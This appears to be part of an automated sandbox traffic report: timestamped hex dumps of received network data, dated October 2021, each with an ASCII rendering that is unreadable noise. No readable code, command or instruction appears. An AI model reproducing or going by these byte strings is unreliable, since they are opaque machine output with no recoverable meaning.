                                                                                                                                                                                2021-10-19 05:23:31 UTC2431INData Raw: 3d f6 ad 23 7c af d2 d4 d3 04 6a 33 3c 70 fd 75 38 e3 a6 6b 67 02 2d d2 8b 4e 1a 11 2c 57 a8 4f c0 0b a1 c9 5c 26 f9 db b5 1c a8 ad bd 3d b2 a4 ec 0a d6 bb 6e 9b 4b 25 5f 84 cc c0 7f 81 c3 c0 12 18 01 98 bb ca 5f 5e b9 0b 97 ab 63 be f8 9d e9 fc f0 ef 31 f0 fb 2b cb ba 1c 6e bf 2f 57 1e c2 ac 08 23 02 b0 2f 5d 14 06 5e fc 85 3c eb a2 06 00 d9 5c 42 6f 2b 47 eb 04 e2 e4 94 e3 9f f2 9e d6 ae 53 80 bf f2 db a2 57 60 cc 80 3f 41 3e a1 fb d4 34 06 69 ea 2b ea 6a 46 5a b9 9a 93 af df 1f 42 2b 84 83 eb aa e2 32 d3 8e b0 5f 8a 04 73 4f e0 cb 88 93 fa 96 61 04 2e fd 7e b3 4e 66 01 81 06 cb 47 4a 81 b7 76 fb fd 3f ac 74 ad a7 63 7f 4e 7b b0 88 ee 0a 09 f3 7f 01 f1 08 73 08 02 29 d9 5b 5e 5d 73 a2 49 df d1 56 58 e9 b8 27 8d ec b4 a5 5f 79 b1 99 48 5f 39 4f 5f 72 1b
                                                                                                                                                                                Data Ascii: =#|j3<pu8kg-N,WO\&=nK%__^c1+n/W#/]^<\Bo+GSW`?A>4i+jFZB+2_sOa.~NfGJv?tcN{s)[^]sIVX'_yH_9O_r
                                                                                                                                                                                2021-10-19 05:23:31 UTC2447INData Raw: d7 b7 f9 9e 61 e9 2f c4 21 fc 3b 3c dc 06 ba 68 9d a9 dc f1 90 e1 96 c0 ff c6 12 f1 a8 e3 9e 9d 22 50 01 00 42 43 c7 e3 17 82 1a ca 01 1e 9e 1d 93 6d 6f c0 67 f4 04 3d e4 c4 37 00 a4 60 4c 81 07 16 36 42 94 a1 24 72 40 85 a6 58 ae b2 5a 25 f2 fc a3 47 e1 a5 bf ae 00 10 6a cf e2 78 fe 95 57 18 fe e8 94 24 86 59 fc 0b 32 cc df 39 4a d4 f0 f8 de 82 dd e6 12 98 f8 35 9d c1 94 95 0b eb 00 c4 bf f9 b8 49 d4 15 24 8f b7 a8 a0 d0 6c fe 86 26 fa 22 65 0f 42 3e 0f d5 03 06 65 7c e5 fe c2 7a 1c 78 fc 16 b3 22 bb f0 14 72 04 39 93 76 33 4c b8 44 b1 ea ff 0a 00 16 42 65 e3 3f a5 28 41 c7 6a a3 8a 0c 3b d9 08 19 a8 2f 26 82 c0 70 ca 25 b7 96 64 6b a8 19 a2 ec de 24 77 96 61 7a e2 8c 07 69 1a d6 95 c7 f0 85 3c 9f c8 4e bd f6 41 2e 11 d2 17 53 20 fc 65 9d d2 00 10 a7 ac
                                                                                                                                                                                Data Ascii: a/!;<h"PBCmog=7`L6B$r@XZ%GjxW$Y29J5I$l&"eB>e|zx"r9v3LDBe?(Aj;/&p%dk$wazi<NA.S e
                                                                                                                                                                                2021-10-19 05:23:31 UTC2463INData Raw: bc 1e 96 c5 fb 97 52 32 cf 4f 54 a6 06 61 1c 5f 16 50 b3 8e 70 62 83 30 c2 c1 57 68 6e 1b 37 09 3c 2c 80 f1 7f 45 b6 17 64 b0 4d 55 bc bc f0 1d ab 46 e2 f1 9e c0 3b e8 9c e8 6e c4 8d c0 43 ed 00 b2 64 22 82 e3 55 5b 88 45 58 e2 e4 19 f8 2c 14 63 33 7c 1a 62 78 14 5d a2 de c4 1a 65 46 09 a5 c8 f1 94 89 ee ff 46 00 30 0a 25 10 30 71 22 59 07 a4 79 a0 42 80 e6 1d 18 a3 a9 09 1f 78 00 53 16 d6 01 9e 0a 41 2e 45 71 30 44 9c aa 64 fc 81 54 3c f9 2e e8 4c a1 45 eb f2 3a d9 ec 62 b6 3a 00 ce 28 80 c9 2b 33 c8 da 42 72 7d fc 3a de 21 f2 ce 53 17 a0 d0 85 90 5c 57 ab 42 86 cc 20 10 bd 5d 0b d5 8f 0c 43 f5 ee 43 11 c7 6a fe 12 14 04 bb a6 f6 84 f3 37 04 40 23 ba fc e6 a4 ce 9e 08 10 62 fe 61 79 4f 0b c1 d9 cd c9 55 f0 fb a1 41 45 dc e9 e8 33 56 0d cd e9 1b 59 65 34
                                                                                                                                                                                Data Ascii: R2OTa_Ppb0Whn7<,EdMUF;nCd"U[EX,c3|bx]eFF0%0q"YyBxSA.Eq0DdT<.LE:b:(+3Br}:!S\WB ]CCj7@#bayOUAE3VYe4
                                                                                                                                                                                2021-10-19 05:23:31 UTC2479INData Raw: 8a 7c c9 3c 5d 34 2f c1 18 49 9f cd 74 0d 6b fd 22 11 25 da 80 5d 68 94 2b c6 4e 28 ea 8e e7 d2 ad bc 90 b8 04 c4 fb 64 74 bb a2 ef 5c f1 81 e8 2c 1b 58 7b df 44 5f b3 5a e5 bc 74 5f a7 34 a5 b3 0e 2f 56 d6 12 c9 77 fb 94 69 f7 51 02 2f fb 2b 50 e9 97 50 e2 fd e6 ff 31 a8 30 67 d2 4b d8 d1 3c 72 9c 3b 71 12 84 7a ea 5d 6c 8e 26 5c 88 89 1c a2 8b 61 de 59 d4 62 0e cd 05 9e 80 01 06 63 cb 74 e5 fc 22 07 43 c7 6d 6a 2c e0 13 84 05 23 2d a4 b3 de 52 e0 89 f4 88 bc c2 80 68 0b 55 d5 e0 2c 44 7c b2 24 b5 c0 29 da e2 c0 10 73 9e 8c 4e 64 41 11 6e e7 e6 62 a4 ba bf e4 98 ba 2e 3d e9 b5 44 fa 92 8e 9f 57 90 31 ba 8c 4a fd 29 2e e1 be 3b 8d 02 20 f4 c8 63 e9 c8 fa 80 2f 08 2f 71 f8 c2 37 40 14 18 4b 24 42 f1 aa 3a 00 8b 77 b1 4c ce 23 a2 ca b5 7e c4 c4 36 e8 08 3e
                                                                                                                                                                                Data Ascii: |<]4/Itk"%]h+N(dt\,X{D_Zt_4/VwiQ/+PP10gK<r;qz]l&\aYbct"Cmj,#-RhU,D|$)sNdAnb.=DW1J).; c//q7@K$B:wL#~6>
                                                                                                                                                                                2021-10-19 05:23:31 UTC2495INData Raw: 25 d5 00 ac 17 6c 92 c1 00 5c 45 d5 26 29 ce 3a 33 4a 01 be dc fe a7 61 15 50 51 55 47 3f b2 fe 2f 21 00 32 e7 d5 3e d3 95 46 c6 31 53 45 08 bd 8a 25 78 81 09 fa 3d f8 d4 be 74 34 e7 00 21 ee 61 62 19 25 db 37 60 8f 28 b2 28 18 6c 2d 06 b1 59 f3 65 0c b8 a7 5a a3 f3 04 10 7a e3 ca eb 08 44 c4 cb f6 26 96 dc ac ff a5 ab 8f c0 2c 98 18 ad 5c c0 89 3e a2 55 b8 dc 34 ab 84 97 7e 50 70 56 55 b7 d3 92 4f e0 50 68 6f e8 38 e1 2f e6 f0 5b 3c 2d 53 b5 79 08 6b 60 91 f7 b6 25 6b 6e 76 91 5a fd c5 87 c9 75 97 12 25 d9 34 49 74 ca ac 52 05 72 2a 43 c0 4b f1 5b c2 3b 67 3b 01 c9 78 38 eb 7f 41 87 1a 7e f8 ef 7b ab 4a 5e e5 da 5d fe 42 f9 87 3a e2 61 e6 0e 95 f1 c1 72 77 2e b6 32 b9 80 96 ef 2b b2 13 f9 70 16 44 02 3c b2 7e fe 21 af 33 b3 30 fa d9 4b 6a ac d6 01 ac 26
                                                                                                                                                                                Data Ascii: %l\E&):3JaPQUG?/!2>F1SE%x=t4!ab%7`((l-YeZzD&,\>U4~PpVUOPho8/[<-Syk`%knvZu%4ItRr*CK[;g;x8A~{J^]B:arw.2+pD<~!30Kj&
                                                                                                                                                                                2021-10-19 05:23:31 UTC2511INData Raw: 0c bd 0b 02 54 0a 98 11 12 10 3f a5 0f 70 4f 95 b1 05 7a 61 f8 2e 00 c1 69 71 ef aa 33 f8 4b 18 f4 66 0d c4 73 0c 12 80 75 59 fb d1 90 78 b7 66 ab 34 70 11 fa ac 44 e0 2b bc ff 86 9d d1 bd e5 29 be 13 2f ba 4e bd 46 a1 90 17 09 23 e1 77 85 1c e8 39 d1 81 b4 4c 2a f0 1e d5 e1 3b b8 6b c1 7c a4 2e 1a 6e dc b3 ac 17 07 05 3f 44 16 55 bd ab f9 fa 16 ca cf 27 d8 02 24 47 98 d8 e9 0b 9f 7e 9e c9 c3 35 4a 19 d3 59 53 e1 6c 8d 81 14 7f 59 23 f1 bc 3a c1 ab 38 ca 81 18 47 3a 25 3d a5 d6 57 78 74 e1 7b 23 87 05 c1 55 dd 94 ec 8c a1 70 00 3c fd 35 bf 43 0c 0b 2a 98 30 07 f1 e6 b2 a3 ef 4a a6 40 e2 d4 c9 87 80 ce 9e 83 b8 25 d9 ca ef fa 83 14 a5 ae c8 8e a6 77 9d a0 b5 03 22 d4 ea 07 3b f1 cd 5b 45 00 dc d3 a4 52 7e b3 27 62 50 d5 64 9c b7 5e 68 08 78 63 4b 77 24 c0
                                                                                                                                                                                Data Ascii: T?pOza.iq3KfsuYxf4pD+)/NF#w9L*;k|.n?DU'$G~5JYSlY#:8G:%=Wxt{#Up<5C*0J@%w";[ER~'bPd^hxcKw$
                                                                                                                                                                                2021-10-19 05:23:31 UTC2527INData Raw: 44 4e c2 7c 9a c2 2a 9f df 7b ae 4b 55 c4 c9 75 26 d6 98 ab 81 c9 8f 5f 9e 3c 89 42 92 5b 8c 5c 40 7e fe e6 be 41 80 af 30 4f 44 dc 16 f0 c4 1f 17 51 05 42 72 c8 a4 3d de 50 83 28 dc 4d cc 05 3b db 57 1f 2d 03 0f 9f 0c 31 94 a1 2f 7b a3 36 c4 c3 7d 60 7b 08 e0 61 9b 28 68 55 5e 2a a0 68 cd 18 ce 77 66 2c da 1b 5b cc b1 13 3e b2 6f c3 89 df a4 85 fb f2 f5 c1 c7 3d d2 fe 38 62 05 6a 96 20 c9 fe 3c fc bd b5 d8 1e be 9b ad 16 39 25 3b 7c 4e 63 2d d3 e7 fc 4d 58 df 85 f7 f1 4a 11 e9 0a 3b 41 d2 f1 96 f4 48 3f bc f3 a9 6b ad fa 7c 97 df 9d 22 15 5c 13 d6 ea 7d f8 08 42 e9 b5 89 db fd c5 7d 14 5b 41 ac 68 09 ef 2b fd 45 f3 0d 6b f7 67 21 93 51 b3 45 d3 2b 88 12 e9 a0 bb 36 4f fc 01 be 98 7f 35 c1 e8 02 cc e0 03 cf 06 07 41 88 13 7e 69 fc 8c af 2f e6 16 5e 14 27
                                                                                                                                                                                Data Ascii: DN|*{KUu&_<B[\@~A0ODQBr=P(M;W-1/{6}`{a(hU^*hwf,[>o=8bj <9%;|Nc-MXJ;AH?k|"\}B}[Ah+Ekg!QE+6O5A~i/^'
                                                                                                                                                                                2021-10-19 05:23:31 UTC2543INData Raw: 42 80 fa ca 42 5d 7e 1c 10 71 54 6d 50 f5 a1 55 6f 8b 09 7d 9d 5d 16 47 a1 84 a9 69 df 79 17 29 f7 3a e9 09 03 6c c2 df 3d 8b c4 fe a3 f3 9d 8c f7 6d 29 57 9f d6 0e 43 e9 7c 75 5b 30 d1 03 2e 41 85 b6 54 09 eb 9c 00 cf 97 ac 39 3f a5 f9 f7 9d db 2f a8 b6 38 d3 33 58 ba 88 19 00 88 66 68 af 50 4d 0c ea eb 35 fe 18 0b 04 33 93 9e f2 47 88 86 d3 01 27 dc 35 be c8 2f 5a 65 bc e8 fe c7 71 36 5f 96 c0 27 cc fa d9 13 f4 55 0a cb aa 13 c9 5e ef 6c 78 a0 40 54 9a 41 06 3e b3 06 5c cd f1 1d e1 19 78 26 f1 b9 96 45 a1 e4 26 3b 1c 23 aa e8 25 fd c6 d5 09 a0 a4 86 43 72 b8 39 fc 4e d9 ce 34 a6 30 eb f7 af 72 70 34 bf 7c c3 60 d1 df 61 62 1d 53 30 41 b0 a4 08 7e cc 2a 5b ad d8 21 a3 bf 3a 20 d4 1b e9 32 0b fe aa 9c 48 19 66 93 0e a8 bd f9 55 60 2d ff 9d 5d c1 06 ed 05
                                                                                                                                                                                Data Ascii: BB]~qTmPUo}]Giy):l=m)WC|u[0.AT9?/83XfhPM53G'5/Zeq6_'U^lx@TA>\x&E&;#%Cr9N40rp4|`abS0A~*[!: 2HfU`-]
                                                                                                                                                                                2021-10-19 05:23:31 UTC2555INData Raw: fe 3d ce 0b ed 52 58 4b a8 c3 f4 b2 93 a5 bf e3 ef 92 eb f7 41 e5 ab 24 6b bc aa f9 3b ae 2e 97 09 93 a4 ec 57 65 3c 87 45 3a fa e9 f7 e4 a4 00 53 d0 5b 43 ad 79 86 b6 a0 1a 45 af 3d 6a 8f 0b 76 a8 03 00 96 43 21 14 eb ec f0 5c d4 76 2f 1e 7e a7 6b 10 76 08 96 84 3f 5a ea 1f 91 31 87 49 d2 f2 d3 d8 d3 7d 38 e0 ce 13 7a fa 19 ff 3c ce d0 58 33 aa 3c 54 76 b5 de 7a 58 f2 74 47 fb 4a ed b6 5a ee 62 7a e9 dd e2 fa 64 f2 b7 43 52 4d 12 dc d7 bf 0b 77 57 77 4c 03 02 a0 80 68 d1 8c 05 57 53 68 0c 56 09 88 e5 b7 05 c4 cb b1 04 2b f9 63 87 27 79 cb 71 74 42 a0 54 02 8b 2b 09 f7 19 6a b4 0c c3 22 01 cb 33 d8 de 74 2f d4 b0 45 c5 bf 59 cf 62 fd 03 71 20 83 df 10 48 2d bb 7c 60 18 9c e3 28 ec 9c 02 64 44 2b a4 b5 2f 7f ba da d7 f1 ff c5 88 bc 2e 58 3a 80 01 9e 4c 96
                                                                                                                                                                                Data Ascii: =RXKA$k;.We<E:S[CyE=jvC!\v/~kv?Z1I}8z<X3<TvzXtGJZbzdCRMwWwLhWShV+c'yqtBT+j"3t/EYbq H-|`(dD+/.X:L
                                                                                                                                                                                2021-10-19 05:23:31 UTC2571INData Raw: b4 24 25 9b 79 02 e4 33 0f c8 69 77 5f 7c 83 88 b5 01 0c 94 d3 56 ac 09 eb d1 26 06 dc 85 78 bb b2 4a ff bb 2d 35 3e b3 2d 12 aa 65 bb b3 ba 88 67 62 47 56 5d d4 ef f3 c7 0e 11 d6 02 e4 0f 2e ff 20 0d 35 b1 4c b8 84 3e c0 38 45 dc 28 af 49 47 62 a0 e1 4a ff 87 89 25 19 5b 0d c4 1a ab 7c 89 f4 00 0d 01 b8 85 fc 72 23 45 04 18 4a 03 16 f3 ee 71 77 11 bf 00 70 1f 22 17 d0 8d 5f 9a 36 27 74 7b e9 78 fe 93 d2 7c fe b2 7b e2 68 24 66 eb 12 17 aa 3c 55 64 88 dc f1 9c 1c eb 47 64 8b d6 c7 5d 09 1b 20 bd 6e fc 2f ef 18 bf 61 ce 1d 17 77 26 71 c5 20 03 ae e9 51 b4 7f 18 0f ff 44 73 d0 c3 e5 49 c9 fe 46 a0 ee 6d e6 4a 03 be 3c 71 12 bf d8 ff 9f 4a 8d 7c 7d 58 88 8e e1 7f bc e1 dc c7 5f 6b 65 99 e4 16 6b 56 39 dd 98 e5 a9 19 09 08 2c 26 37 d5 44 d1 6e e3 0e 0e 24 13
                                                                                                                                                                                Data Ascii: $%y3iw_|V&xJ-5>-egbGV]. 5L>8E(IGbJ%[|r#EJqwp"_6't{x|{h$f<UdGd] n/aw&q QDsIFmJ<qJ|}X_kekV9,&7Dn$
                                                                                                                                                                                2021-10-19 05:23:31 UTC2587INData Raw: 58 2e 52 11 91 84 97 ad b6 6b 62 32 68 01 5c 5d 66 5e d5 fe b5 2c b4 73 76 3d 13 e9 4c 34 03 fb 8b 21 48 b9 00 ec 57 9f 46 81 cd 78 06 33 ff 4f f7 dd b6 e1 e7 27 10 01 7d c4 7f 94 2a 29 c6 fa 77 1c 7d ea f1 94 23 00 f3 b7 fb d8 db 55 69 a6 ba f5 1c f6 d6 e9 a8 d9 ad 05 16 be 80 89 4e 1d 19 f9 2b b8 4c d0 dc 5b ad 00 80 52 ba 60 e2 9a 4b 77 fd 39 d2 60 ac 68 f7 8a 25 52 75 d1 f7 82 fa fb 8c ed fb 99 96 aa a8 4b e9 3e f8 b3 c1 f5 05 a7 6b 2b bc bc fd 6f ac 5c ad 3e f2 03 cb 42 5f 65 5c 2f 70 49 00 6f b8 3f 19 81 cf d3 93 25 de 7a 54 f5 83 2c 2d fd 75 f1 ef 28 30 3b f9 bd 62 4e 75 6d 08 af 59 39 fa 22 da e9 ef c4 e2 31 78 3d 0c b7 9c 84 12 cf 4e 1e fc 71 0c fb 4d a1 0a 72 60 e1 26 fa 30 ef 99 00 3f 93 6a 5d 0b bc d5 cf 65 5f 1e 73 ac 39 7b 77 be f1 00 af ea
                                                                                                                                                                                Data Ascii: X.Rkb2h\]f^,sv=L4!HWFx3O'}*)w}#UiN+L[R`Kw9`h%RuK>k+o\>B_e\/pIo?%zT,-u(0;bNumY9"1x=NqMr`&0?j]e_s9{w
                                                                                                                                                                                2021-10-19 05:23:31 UTC2603INData Raw: c6 7f 5b 41 34 2f 42 b6 bf 58 2f fd f9 10 98 55 1d 03 3b e2 01 94 d7 67 fd a3 eb 26 d2 1c 57 56 83 7a 5d 54 e1 52 77 cc 08 95 f6 bc a7 47 4b 72 8b dd 5d 97 34 27 f3 89 c9 57 45 43 49 55 f1 02 68 58 da dc 2b 5a 56 67 8b 3a 15 fe 03 44 57 cb ac 4b 95 60 eb e3 f7 93 65 23 02 20 0d 31 45 c6 0a cb a9 5d 7b d4 b4 16 ab e8 18 f9 81 bc 68 cb 91 40 28 2f 27 66 a0 f1 60 9d 08 bd 27 28 cb 14 ef bc 03 00 c8 06 bf 7d c1 e1 07 c1 12 f3 38 af 5e 82 0c 89 48 b3 b9 55 d8 44 9d 7a a6 9f 57 9f fc a7 7f 4d 69 49 fd e5 d4 eb d5 47 42 00 51 b9 87 48 fe 7a 60 49 62 e7 c8 ed 37 c1 0c b3 a5 9b 77 00 e4 48 78 4f d5 be 32 21 8b 7d 7e b7 c2 54 5f 77 79 05 58 e9 1a 5d f4 ed 2f d0 7f 16 88 bf d4 0f d1 56 39 c5 30 50 27 e8 0e 46 8e 95 55 3e 85 95 51 56 cb 7b 76 2b 5a 2d d5 95 aa ad f7
                                                                                                                                                                                Data Ascii: [A4/BX/U;g&WVz]TRwGKr]4'WECIUhX+ZVg:DWK`e# 1E]{h@(/'f`'(}8^HUDzWMiIGBQHz`Ib7wHxO2!}~T_wyX]/V90P'FU>QV{v+Z-
                                                                                                                                                                                2021-10-19 05:23:31 UTC2619INData Raw: d2 e3 38 84 48 50 82 e5 49 0c 6a 75 22 a4 2e 7d 60 94 0a f5 a4 9c 00 54 0b 89 4e 60 91 11 50 83 c0 18 7e e3 13 ee 81 5a 81 f8 f9 24 fa 75 65 ba 0b 7e 6b 75 ba 88 6f a8 a6 5a 27 57 45 4a 49 7d d0 2b e8 42 02 bf 5f 81 e6 bc 5b e3 63 b1 ee 10 a5 19 56 56 25 5f 45 a2 27 df 02 0f a5 47 55 7e 89 02 39 d6 40 6d 54 d7 c9 d5 ef 81 2f 51 82 5a fd 65 93 27 d7 15 70 34 22 cb ce cf 8b 12 ea f2 08 b2 52 77 dc 75 5c 95 72 32 c0 44 7d 4a 7f 6b 35 69 79 0b 5e 6a 5a d7 f9 54 72 03 b6 1b 46 93 7b e0 e9 aa d5 1d 7e 57 c1 9e 04 52 c9 10 cd e6 5e bd a4 04 ad d0 d3 2f 01 56 17 2c 50 2b 12 29 bf e2 a5 c0 9c 9f eb ff 89 98 80 38 48 a8 4f af 71 6b 78 b6 c2 7d f9 4c a7 5a 1e 9d d4 70 e9 7d 73 54 c9 76 be 40 d3 f0 e8 2c ab e1 c0 40 b4 0e 5e 77 b4 cf db 4e e9 ff 62 77 51 57 6e 00 c0
                                                                                                                                                                                Data Ascii: 8HPIju".}`TN`P~Z$ue~kuoZ'WEJI}+B_[cVV%_E'GU~9@mT/QZe'p4"Rwu\r2D}Jk5iy^jZTrF{~WR^/V,P+)8HOqkx}LZp}sTv@,@^wNbwQWn
                                                                                                                                                                                2021-10-19 05:23:31 UTC2635INData Raw: 6b d8 f2 19 31 06 01 cf 7c ee 20 74 96 97 73 4c 0a 60 8c 96 a5 40 14 3b 23 4d 18 6d 09 fa 39 47 76 76 02 1f 08 f0 55 2e 8b 6e 70 f8 ac f8 5f ac e2 0e 10 4a 47 5b f1 e8 2a ac 62 f2 0f 7c 0a 25 55 86 62 44 e5 05 98 c1 95 fb 9d d1 f0 ca 9a 2a 34 dc c2 5a ab d8 3a 76 49 24 03 9b f2 80 a0 cf 55 aa e4 c1 1f 4f bb c6 e7 dd b8 ec f3 de 97 ce 30 bc 54 58 b6 f3 95 46 24 38 ac 7e 57 28 11 02 6c 80 c5 23 19 40 b1 01 41 7f 45 c9 ce 16 dc af 8c d7 90 e4 75 08 30 be 91 3c 62 55 48 b0 7c 4c 47 f4 85 f0 9a 21 e2 13 dd 3e e7 06 00 20 c0 56 61 5c ef 6e 17 e2 21 fb eb 2c 91 73 25 86 2d 7f 9c 4a 31 4f b0 69 32 da a5 26 7d 6c 6c 70 1b 97 1a 28 d9 70 62 93 9c 14 b6 18 80 d7 b6 0a 3b fa 4e 30 b2 2e 64 c3 fb f0 00 f5 5e 0b 1f 62 13 c0 da 18 ae 10 b1 34 b0 fc 02 ef 50 1b 8f d2 15
                                                                                                                                                                                Data Ascii: k1| tsL`@;#Mm9GvvU.np_JG[*b|%UbD*4Z:vI$UO0TXF$8~W(l#@AEu0<bUH|LG!> Va\n!,s%-J1Oi2&}llp(pb;N0.d^b4P
                                                                                                                                                                                2021-10-19 05:23:31 UTC2651INData Raw: 6c a9 02 70 78 40 87 e5 12 d5 42 fb a3 4e 18 8e 93 34 40 ff 76 92 a0 20 d0 4b 3e b9 b7 38 08 5f ff 7c a2 08 e3 3a 2c 18 22 29 66 fe b4 81 0c 26 93 44 5c 6e d0 93 5f 17 34 4a 11 be 33 c4 0c b2 57 5f f3 f8 45 2c bf e4 ec 0d 18 75 9b 73 45 bf d4 2d 1d 48 7d 9e 9b d3 26 0f 00 3a e4 0a 16 ba b7 f4 96 01 21 4a b3 d9 0a bc 13 02 43 94 dc 0f 58 7f 7b 40 6b f1 77 4b 5f 3c 99 b7 74 f0 74 9f f4 50 54 b5 d6 eb 74 9f 71 b0 7a 4a f9 57 fc 2c db fd cb cf 0e e9 53 94 72 47 88 6c fd 5e c9 30 23 84 be c3 ec 71 52 44 00 d2 40 0f 00 d0 08 73 30 cd 3d 84 32 de 1d 9e 9c c6 4a 05 f1 58 27 e7 a6 df 02 42 a7 f0 30 8c 47 ce 34 5f 64 2d 1e 80 2f 99 94 05 1c 23 77 e0 27 dd 6e 04 38 0e 1a 4b ef 30 26 05 72 d3 2f 50 01 5d b8 dc d2 f4 d7 30 ae 89 dc 29 68 5b ad 17 62 a8 73 8a dc 90 e2
                                                                                                                                                                                Data Ascii: lpx@BN4@v K>8_|:,")f&D\n_4J3W_E,usE-H}&:!JCX{@kwK_<ttPTtqzJW,SrGl^0#qRD@s0=2JX'B0G4_d-/#w'n8K0&r/P]0)h[bs
                                                                                                                                                                                2021-10-19 05:23:31 UTC2667INData Raw: 03 80 e9 ac f0 27 3b 01 00 3b 14 0b 7f d5 9b 1d 42 87 fb d9 e7 e4 68 41 df 82 f5 ff c8 c0 32 b2 9f 26 a6 f2 1d 00 4a fc 86 4c 53 0b 2e 48 e4 95 ad f3 00 26 4f 50 e5 65 88 28 60 7a 6b 5e c8 2c a1 f8 4b 67 e7 f0 2d b3 89 33 f5 1b c8 10 3c 20 f5 12 f7 54 9b 31 12 39 28 fc 22 d3 f4 87 0f 52 03 8e 2f d3 8b c6 f1 24 a7 56 32 51 53 2a ab 2f e5 4e 8b c9 17 68 1d 0b 2d 51 5f 19 8f 55 f0 ae 37 4e 46 dc cb d9 12 3e 73 2a be b3 70 4a ea 99 06 7f fc f6 b5 bf b4 de a2 1e db 45 7b 40 b9 91 98 df 77 21 00 ca 59 81 f2 8e 06 bf 2e ec ea 0b 0a 9e fa 5d 7f c0 f3 e9 04 97 7b e6 eb de b0 af 4f 25 27 74 52 d2 29 aa 5e 1e e7 c3 3b df 9d a3 25 7f e7 61 49 d5 45 9f 6c 33 e9 25 c7 5f d5 e0 0f 1f ba 90 4e 4a 03 ae 8d 30 dd c4 c2 21 c3 2f a5 6f 01 f3 fa 7b 7c 51 2c 9f 20 df f3 a5 1d
                                                                                                                                                                                Data Ascii: ';;BhA2&JLS.H&OPe(`zk^,Kg-3< T19("R/$V2QS*/Nh-Q_U7NF>s*pJE{@w!Y.]{O%'tR)^;%aIEl3%_NJ0!/o{|Q,
                                                                                                                                                                                2021-10-19 05:23:31 UTC2683INData Raw: 1e b2 5c 85 4c 32 25 f3 e4 c4 3f 9c 63 24 85 ab 9d 49 96 b4 db fb cc 0e 62 f6 c8 1d 94 e2 08 96 bd ae 8a 28 5e 42 8c da 1b b4 df 80 5c c6 23 ae 8d d2 c0 eb d8 24 06 7c ce 89 86 2a b6 8a 17 e5 67 fe 20 04 4c 94 24 4a e2 fc 64 c7 2d f6 08 40 f1 ad cc 82 c0 80 e2 42 5d e6 09 56 59 f8 92 ec 02 92 a9 94 e0 56 f1 ff 86 00 8b bf 0f 88 6b 03 c9 c3 bb 84 42 7d ae 1c bf 76 74 ee 7d 65 f6 e8 72 f5 16 cd b5 19 bd 68 fc 61 47 bf fb bd cb 75 6e 6e 95 f7 3c 81 97 90 f4 af 90 33 18 23 71 51 03 1d 68 fb d1 7a 78 3d 11 ba 89 5b 9e 4f f5 f9 0e 52 5f f6 a2 54 9f e7 2f 25 e2 26 7f fb 7b 25 c7 c8 c0 68 4e 62 72 69 60 a3 75 6f 8c a5 c6 cc 04 68 cf 91 0e 27 af bd df a4 e8 33 f0 e9 f4 8a 98 d1 b5 16 23 0b 19 f7 2b 36 5e f7 80 4e 97 29 50 11 d7 be 25 5b e1 7c fd 1c d6 18 07 65 90
                                                                                                                                                                                Data Ascii: \L2%?c$Ib(^B\#$|*g L$Jd-@B]VYVkB}vt}erhaGunn<3#qQhzx=[OR_T/%&{%hNbri`uoh'3#+6^N)P%[|e
                                                                                                                                                                                2021-10-19 05:23:31 UTC2699INData Raw: f5 d9 44 c9 59 5c 84 4f 0d fe 36 f4 20 f1 87 29 df 0e be 02 ec 70 0d db 71 26 62 41 89 db 76 87 2a 23 f3 9f 93 98 72 a0 12 a4 ab bb aa 71 88 bd 6d 6e cc 98 11 38 36 02 40 05 49 01 cd a1 93 85 7a f6 65 f0 8e 5c fb 85 62 22 ef 77 51 7b 09 d5 2d 4d f4 88 fe e6 52 7f 20 6c db ca ab 09 3a 75 03 0f ce f0 23 84 2a fe ef e9 ed ca b5 81 38 4e fe 89 9d 48 31 c6 48 4b b3 62 0c 53 56 d4 d3 89 98 63 fe e9 58 8b 48 25 30 fc 5c 86 70 5b f3 40 32 da 01 e4 c4 72 ee 5f a4 87 2f c2 1a 2e 11 6e 7e ed ec 08 b1 60 fe 91 37 46 b6 84 34 ca be db 88 c2 3c 2f f5 74 d0 f2 5c 05 47 67 08 40 5d b4 03 86 93 ce 14 c7 11 82 19 b0 fc 4a 22 fd 96 cb 30 ed a8 b8 d2 c7 08 01 34 57 d9 a4 3f 9c f5 68 ce f1 46 a1 08 dd 05 d0 97 f7 0f 41 38 70 94 4a 53 ed 6a bc a9 25 60 fd 77 65 8f e4 6e 44 9b
                                                                                                                                                                                Data Ascii: DY\O6 )pq&bAv*#rqmn86@Ize\b"wQ{-MR l:u#*8NH1HKbSVcXH%0\p[@2r_/.n~`7F4</t\Gg@]J"04W?hFA8pJSj%`wenD
                                                                                                                                                                                2021-10-19 05:23:31 UTC2715INData Raw: 6b 87 8a c5 a1 2d ec c2 41 cd 2f ea 6d 27 7b a9 fe 00 f3 1f af 3f 81 c3 11 24 e0 50 e8 09 d9 5b 57 d9 1d 72 5d 4d 43 2d ec 88 09 ea 5d 87 14 74 fc fa 10 67 81 c5 e4 3c 5c be 8d 3c cd 28 ed 08 4e 59 ba 79 35 82 ed 68 3a 1d 31 54 37 a5 74 ea da df e7 20 0e 01 6d 72 a6 c6 87 6c 80 08 79 5d ee 3c 27 98 f0 67 08 98 92 3d 5c 84 94 70 e9 84 b2 e3 bf 16 f2 ae 40 75 e0 34 e4 20 05 17 23 52 2e 92 66 e1 27 ca c2 ae 9d 09 f5 c4 b9 9d 9e a0 16 ae c5 01 fa 8b 1e 13 88 2f 0b f8 cc e0 bc 1f 9b 02 1e 54 66 aa b3 43 5d 49 d4 45 2c f6 12 48 d3 8b de 10 7b e0 a4 bb cb 9e 27 20 80 86 d6 29 56 57 f4 cb 9d 96 76 21 60 13 4b f9 02 61 40 13 01 1d 3b 2c b2 e4 4f 04 a7 a0 4e f8 4e f0 f0 45 01 e1 08 06 61 7d 24 65 3f 69 6b 84 9a 91 ec 96 01 33 a0 4c f2 1c 5d c5 22 97 74 05 02 17 23
                                                                                                                                                                                Data Ascii: k-A/m'{?$P[Wr]MC-]tg<\<(NYy5h:1T7t mrly]<'g=\p@u4 #R.f'/TfC]IE,H{' )VWv!`Ka@;,ONNEa}$e?ik3L]"t#
